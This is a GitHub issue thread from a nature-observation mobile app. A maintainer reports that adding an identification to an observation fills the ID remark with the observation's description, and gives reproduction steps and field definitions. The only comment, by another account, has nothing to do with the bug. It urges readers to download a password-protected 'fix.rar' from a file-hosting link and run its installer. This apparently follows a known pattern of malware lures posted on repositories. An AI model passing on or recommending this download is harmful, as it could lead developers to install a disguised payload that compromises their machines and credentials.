### ISSUE TITLE
Adding ID to obs w/ description populates ID remark w/ obs description

### ISSUE THREAD

**Issue by kueda** [inaturalist/iNaturalistReactNative#2003]
**Describe the bug**
When you add an ID to an observation with a description, the ID remark gets populated with the observation description.

**To Reproduce**
1. Navigate to ObsDetails for an obs w/ a description
2. Tap SUGGEST ID and choose any taxon that is not an ancestor disagreement
3. When you land on ObsDetails, you see the SUGGEST ID bottom sheet, but the remark shows the observation description

**Expected behavior**
The remark should always be blank until the user adds it. That content is authored by the identifier, not the observer.

**Context (please complete the following information):**
 - Device: iPhone SE, 3rd gen
 - OS: iOS 17.5.1
 - App version: [v0.43.0+112](https://github.com/inaturalist/iNaturalistReactNative/releases/tag/v0.43.0%2B112)

**Additional context**
A lot of the logic here needs refactoring. The ID remark is *never* the observation description, but we have numerous instances where it gets set that way or defaulted to that value.

The `observation.description` is a text field associated with an observation. It's what you enter to describe what you observed and it can only be authored or edited by the observer. The `identification.body` is a totally different field associated with an identification. It provides a space for an identifier to explain why they added the identification or any other remarks they wish to include with their ID. It is only authored and edited by the person who made the ID.

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
